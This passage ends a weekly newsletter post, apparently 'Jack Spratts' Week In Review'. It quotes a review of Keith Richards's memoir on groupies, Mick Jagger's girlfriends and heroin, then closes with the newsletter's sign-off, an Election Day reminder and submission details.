Even groupies are accorded respect. “You could look upon them more like the Red Cross,” he says. “They’d wash your clothes, they’d bathe you and stuff.”

Learning that there’s a blind girl who loyally follows the band, he arranges for her to get rides from the group’s truck drivers.

“I’ve been saved by chicks more times than by guys,” he writes. “Sometimes just that little hug and kiss and nothing else happens. Just keep me warm for the night, just hold on to each other when times are hard, times are rough.”

The Prince of Darkness who got in trouble with feminists for “Under My Thumb” is, it turns out, a cuddler who loves strong, high-spirited women.

He had the “unlikely role of consoler” for Mick’s girlfriends when Jagger cheated. “The tears that have been on this shoulder from Jerry Hall, from Bianca, from Marianne, Chrissie Shrimpton ... They’ve ruined so many shirts of mine.” Including when Jerry found a note from one of Mick’s girlfriends written backward that said, “I’ll be your mistress forever.”

“Really good code, Mick!” Richards chides.

The guitarist explained in an interview with NPR’s Terry Gross that the band’s so-called “anti-girl” songs could just as easily be about guys.

“Under My Thumb,” he said, could’ve been about a guy under a woman’s thumb and “you’re just trying to fight back.” Besides, he says, he didn’t write the lyrics — Jagger did.

In the book, he explains: “The songs also came from a lot of frustration from our point of view. You go on the road for a month, you come back, and she’s with somebody else.”

The biggest “seductress” in his life was heroin, he writes, which he relied on to anesthetize him from the “blah blah blah” of show business, something he did not enjoy as much as Jagger.

He said he never collected women, like Jagger and Bill Wyman, or “paid for it,” or indulged women who collected rock stars.

“I’ve never been able to go to bed with a woman just for sex,” writes the author, happily married for decades to the former model Patti Hansen, whom he is supporting through bladder cancer. “I’ve no interest in that. I want to hug you and kiss you and make you feel good and protect you. And get a nice note the next day, stay in touch.”

The consummate gentleman. Who knew?

Until next week,

- js.

Tuesday, November 2nd Is Election Day.

Don't Forget To

Current Week In Review

Recent WiRs -

October 23rd, October 16th, October 9th, October 2nd

Jack Spratts' Week In Review is published every Friday. Submit letters, articles, press releases, comments, questions etc. in plain text English to jackspratts (at) lycos (dot) com. Submission deadlines are Thursdays @ 1400 UTC. Please include contact info. The right to publish all remarks is reserved.

"The First Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public."
- Hugo Black